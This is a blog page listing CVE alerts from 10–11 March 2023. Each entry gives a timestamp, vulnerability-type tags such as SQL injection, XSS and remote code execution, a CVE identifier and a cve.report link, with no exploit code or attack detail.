2023-03-11 07:00:05.205889 (Jenkins, XSS) CVE-2023-27898 https://cve.report/CVE-2023-27898
2023-03-11 07:00:05.206898 (Remote Code Execution) CVE-2023-25143 https://cve.report/CVE-2023-25143
2023-03-11 07:00:05.207465 (SQL injection) CVE-2023-1198 https://cve.report/CVE-2023-1198
2023-03-11 08:00:06.123215 (PHP, File Upload) CVE-2023-23328 https://cve.report/CVE-2023-23328
2023-03-11 08:00:06.123768 (XSS) CVE-2023-23326 https://cve.report/CVE-2023-23326
2023-03-11 19:00:04.505535 (Command Injection, Critical) CVE-2023-1350 https://cve.report/CVE-2023-1350
2023-03-11 19:00:04.505941 (PHP) CVE-2023-1349 https://cve.report/CVE-2023-1349
2023-03-11 22:00:04.323025 (PHP, SQL injection, Critical) CVE-2023-1351 https://cve.report/CVE-2023-1351
반응형
반응형
datetime subject id link
2023-03-10 01:00:03.115675 (PHP, SQL injection, Critical) CVE-2023-1294 https://cve.report/CVE-2023-1294
2023-03-10 01:00:03.116089 (MySQL, PHP, SQL injection, Critical) CVE-2023-1293 https://cve.report/CVE-2023-1293
2023-03-10 01:00:03.116470 (PHP, SQL injection, Critical) CVE-2023-1292 https://cve.report/CVE-2023-1292
2023-03-10 01:00:03.116760 (PHP, SQL injection, Critical) CVE-2023-1291 https://cve.report/CVE-2023-1291
2023-03-10 01:00:03.117123 (PHP, SQL injection, Critical) CVE-2023-1290 https://cve.report/CVE-2023-1290
2023-03-10 03:00:04.418983 (XXE) CVE-2023-1288 https://cve.report/CVE-2023-1288
2023-03-10 03:00:04.419198 (Remote Code Execution) CVE-2023-1287 https://cve.report/CVE-2023-1287
2023-03-10 07:00:06.313313 (Remote Attack) CVE-2023-20049 https://cve.report/CVE-2023-20049
2023-03-10 07:00:06.314251 (Kubernetes) CVE-2023-27484 https://cve.report/CVE-2023-27484
2023-03-10 07:00:06.314645 (Kubernetes) CVE-2023-27483 https://cve.report/CVE-2023-27483
2023-03-10 07:00:06.314962 (PHP, SQL injection) CVE-2023-27214 https://cve.report/CVE-2023-27214
2023-03-10 07:00:06.315320 (PHP, SQL injection) CVE-2023-27213 https://cve.report/CVE-2023-27213
2023-03-10 07:00:06.315536 (PHP, XSS) CVE-2023-27212 https://cve.report/CVE-2023-27212
2023-03-10 07:00:06.315780 (PHP, XSS) CVE-2023-27211 https://cve.report/CVE-2023-27211
2023-03-10 07:00:06.316071 (PHP, SQL injection) CVE-2023-27210 https://cve.report/CVE-2023-27210
2023-03-10 07:00:06.316441 (PHP, XSS) CVE-2023-27208 https://cve.report/CVE-2023-27208
2023-03-10 07:00:06.316635 (PHP, SQL injection) CVE-2023-27207 https://cve.report/CVE-2023-27207
2023-03-10 07:00:06.316963 (PHP, XSS) CVE-2023-27206 https://cve.report/CVE-2023-27206
2023-03-10 07:00:06.317316 (PHP, SQL injection) CVE-2023-27205 https://cve.report/CVE-2023-27205
2023-03-10 07:00:06.317523 (PHP, SQL injection) CVE-2023-27204 https://cve.report/CVE-2023-27204
2023-03-10 07:00:06.317780 (PHP, SQL injection) CVE-2023-27203 https://cve.report/CVE-2023-27203
2023-03-10 07:00:06.318058 (PHP, SQL injection) CVE-2023-27202 https://cve.report/CVE-2023-27202
2023-03-10 08:00:07.510890 (PHP, Critical) CVE-2023-1303 https://cve.report/CVE-2023-1303
2023-03-10 08:00:07.511289 (PHP) CVE-2023-1302 https://cve.report/CVE-2023-1302
2023-03-10 08:00:07.511584 (PHP, SQL injection, Critical) CVE-2023-1301 https://cve.report/CVE-2023-1301
2023-03-10 08:00:07.511907 (PHP, SQL injection, Critical) CVE-2023-1300 https://cve.report/CVE-2023-1300
2023-03-10 08:00:07.512556 (XSS) CVE-2023-0050 https://cve.report/CVE-2023-0050
2023-03-10 11:00:04.618899 (GitHub) CVE-2023-1307 https://cve.report/CVE-2023-1307
2023-03-10 18:00:04.720245 (PHP, SQL injection, Critical) CVE-2023-1311 https://cve.report/CVE-2023-1311
2023-03-10 18:00:04.720543 (PHP, SQL injection, Critical) CVE-2023-1310 https://cve.report/CVE-2023-1310
2023-03-10 18:00:04.720857 (PHP, SQL injection, Critical) CVE-2023-1309 https://cve.report/CVE-2023-1309
2023-03-10 18:00:04.721165 (PHP, SQL injection, Critical) CVE-2023-1308 https://cve.report/CVE-2023-1308
2023-03-10 18:00:04.721421 (SQL injection) CVE-2023-1091 https://cve.report/CVE-2023-1091
2023-03-10 20:00:08.209186 (GitHub, XSS) CVE-2023-1312 https://cve.report/CVE-2023-1312
2023-03-10 21:00:04.723760 (GitHub) CVE-2023-1313 https://cve.report/CVE-2023-1313
2023-03-10 21:00:04.724142 (Remote Attack) CVE-2023-22301 https://cve.report/CVE-2023-22301
2023-03-10 23:00:04.506170 (PHP, SQL injection) CVE-2023-24774 https://cve.report/CVE-2023-24774
반응형

+ Recent posts